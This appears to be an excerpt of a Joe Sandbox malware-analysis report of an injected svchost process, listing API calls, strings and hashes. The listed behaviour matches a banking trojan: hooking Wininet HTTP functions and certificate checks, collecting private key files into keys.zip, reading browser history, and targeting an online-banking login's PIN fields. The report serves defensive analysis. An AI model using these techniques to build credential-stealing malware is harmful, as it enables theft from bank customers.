                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FileOperation$ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: A23C41FB$\*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                              • API String ID: 3912299499-868612816
                                                                                                                                                                                                              • Opcode ID: 3279e5d2f4b530634fe33d7322976353ad5b3d79dd8bfadd28dcb65fbfaa2354
                                                                                                                                                                                                              • Instruction ID: 60129887002b2fd3f3b0039815e94fe93d891c47d963ebd97ecf6f9169e43ed6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3279e5d2f4b530634fe33d7322976353ad5b3d79dd8bfadd28dcb65fbfaa2354
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2E116B0D0125A9FCB11CFA8D950BEEBBF4AF49304F1486AAD989E7211E7309754CF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB20EE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c45b7), ref: 02CB212F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c45b7), ref: 02CB216B
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB2180
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB218A
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2192
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB21A3
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB21AA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CB21E2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CB21EF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c45b7,?,?), ref: 02CB2237
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: a23c45b7$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 1668326001-3461755649
                                                                                                                                                                                                              • Opcode ID: 2ca7b0dade074c9ecd6b1055c20df31385d4e2aaad4aee2f3736c93b31c09f71
                                                                                                                                                                                                              • Instruction ID: b1b74fa657f59ea2813a1b03a470c14afac4f8cdfd49afee4d167726d7ad3288
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ca7b0dade074c9ecd6b1055c20df31385d4e2aaad4aee2f3736c93b31c09f71
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08716831D403459FDB228B349C98BEB7BE8EF86341F544A94ED89D7240DB718A44CB92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: open$taskmgr
                                                                                                                                                                                                              • API String ID: 0-1543563666
                                                                                                                                                                                                              • Opcode ID: 1120edc397f4f1f664eda6828e20008ea0a3d8ba36f304bd949599f1d5ed9cde
                                                                                                                                                                                                              • Instruction ID: 1f518823225af7d66f8dbb2e6b95c3d585d961bcbb713663bf38e72a1546bf8d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1120edc397f4f1f664eda6828e20008ea0a3d8ba36f304bd949599f1d5ed9cde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8091EC72A41204EFDB10DF68EC8CFAA7768FB89356F504755FA06DB281C771A911CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB01BE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4055), ref: 02CB01EB
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB022D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB0233
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB023B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB024C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB0253
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4055,?,?), ref: 02CB02C7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02CB0305
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: A23C4055$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$path.txt
                                                                                                                                                                                                              • API String ID: 2217318736-2931291103
                                                                                                                                                                                                              • Opcode ID: bf20a983780dcac52c3d887f99e9797eec772559cc9a083246e2363a9ad00a78
                                                                                                                                                                                                              • Instruction ID: ce363e298c2c9fdcdb6a6d9f824cf33e70105945c2d113fc566792f793167cdf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf20a983780dcac52c3d887f99e9797eec772559cc9a083246e2363a9ad00a78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87710A30A457155FDB228B349C5CBFB7BE4EF86381F444694E98AD7241DB70DA48C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CB1A83
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CB1A92
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CB1AA1
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED4A8), ref: 02CB1ACD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED4A8), ref: 02CB1B03
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02CB1B6C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB1B76
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB1B7E
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB1B8F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB1B96
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CB1BA3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02CB1BCD
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02CB1BF2
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,02CA8A50), ref: 02CB1C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 02CB1C29
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02CB1C33
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02CB1C3E
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB1C45
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB1C53
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB1C64
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$AdminCloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystemUser
                                                                                                                                                                                                              • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                              • API String ID: 532458909-2725162336
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,74DEF550,00000000), ref: 02CA11AE
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02CA11C4
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,74DF1620), ref: 02CA11DC
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02CA11FE
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02CA120A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02CA1220
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02CA123C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02CA1258
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02CA1274
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02CA1290
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02CA12AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02CA12C8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02CA12E4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02CA1300
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                              • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                              • API String ID: 1705253364-835984666
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02CAF05D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C40D7), ref: 02CAF09E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C40D7), ref: 02CAF0D2
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAF0E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAF0F1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAF0F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAF10A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAF111
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAF14B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAF158
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C40D7,02CDFDB8,02CDFDB9), ref: 02CAF199
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAF1D4
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAF1DE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAF1E6
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAF1F7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAF1FE
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAF23B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAF248
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAF420,02CDFDB8,00000000,00000000), ref: 02CAF27E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAF296
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAF2A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                              • String ID: A23C40D7$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                              • API String ID: 448721894-436787560
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CAD278
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,found.), ref: 02CAD293
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,asus), ref: 02CAD2AE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAD2D4
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAD30E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAD318
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAD320
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAD32F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAD336
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB,?,?), ref: 02CAD3D9
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAD413
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAD41D
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAD425
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAD434
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAD43B
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02CAD52F
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 02CAD563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                              • String ID: .txt$.zip$A23C41FB$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 2233314381-1437551950
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02C94925
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C9494D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,74DF3490), ref: 02C94987
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C949A9
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C949B5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,IE history:,0000000C,02C958F1,00000000), ref: 02C949C9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C949D7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C949EB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C949F7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5C1C,00000001,00000000,00000000), ref: 02C94A0B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C94A19
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94A43
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94A4F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C94A64
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C94A74
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94A88
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94A94
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94AA8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94AB6
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C94AD5
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02C94AEC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                              • API String ID: 757183407-427538202
                                                                                                                                                                                                              • Opcode ID: d4b0054f9edbd653c8fc9df547db2f0c867c72a688febebaa9a3a743e97f915f
                                                                                                                                                                                                              • Instruction ID: 0fcef97322e5274692c5a82a50696e7b20e6d9a8dadef635afe2b80d5c5ecf87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4b0054f9edbd653c8fc9df547db2f0c867c72a688febebaa9a3a743e97f915f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4514C71A81304BBFB249B909C4AFEE7B7CEB45B45F504648F701EA1C0D7F05A458BA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4037
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB4075
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB407F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB4087
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB4098
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB409F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?), ref: 02CB40FD
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 02CB410C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4137
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB4197
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C,?,00000000), ref: 02CB41D7
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB4237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4297
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 2433436401-604994656
                                                                                                                                                                                                              • Opcode ID: b8a3d2064a69a750f93ba15baedb86d1859791f238663ab11d0f3fc76be37d11
                                                                                                                                                                                                              • Instruction ID: 0261fc093d1f1af4749ef2fe4fe55e53939f77b950b021a05fd30e497d3bb939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8a3d2064a69a750f93ba15baedb86d1859791f238663ab11d0f3fc76be37d11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AB1FB30D0464A5BDF2BCB7898787FA7BE5BF89300F144A94E99AD7241DB719A48CB40
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02C9DA2D
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02C9DA3E
                                                                                                                                                                                                                • Part of subcall function 02C9D970: GetComputerNameA.KERNEL32(02CDF588,?), ref: 02C9D987
                                                                                                                                                                                                                • Part of subcall function 02C9D970: lstrlenA.KERNEL32(02CDF588,?,?,02CA76EC), ref: 02C9D992
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9D9D2
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9D9E2
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9D9F2
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9D9FF
                                                                                                                                                                                                                • Part of subcall function 02C9D970: wsprintfA.USER32 ref: 02C9DA0C
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CDF5A0), ref: 02C9DA6A
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9DA83
                                                                                                                                                                                                                • Part of subcall function 02C99020: SetThreadDesktop.USER32(?,74DEF590,74DE16B0,?), ref: 02C9902F
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDC.USER32(00000000), ref: 02C99037
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C99048
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDeviceCaps.GDI32(00000000,00000008), ref: 02C99059
                                                                                                                                                                                                                • Part of subcall function 02C99020: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C99070
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C990B2
                                                                                                                                                                                                                • Part of subcall function 02C99020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C990C2
                                                                                                                                                                                                                • Part of subcall function 02C99020: DeleteObject.GDI32(00000000), ref: 02C990C5
                                                                                                                                                                                                                • Part of subcall function 02C99020: ReleaseDC.USER32(00000000,00000000), ref: 02C990CE
                                                                                                                                                                                                                • Part of subcall function 02C99020: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C99129
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CDF54C), ref: 02C9DAB0
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9DAC3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,02CDF670), ref: 02C9DAE1
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02C9DAFF
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02C9DB20
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(02CDF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02C9DB3D
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02C9DB47
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C9DB61
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,02CDF630), ref: 02C9DB79
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02C9DB97
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 02C9DBB8
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(02CDF630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02C9DBD5
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02C9DBDF
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C9DBFD
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C9DC10
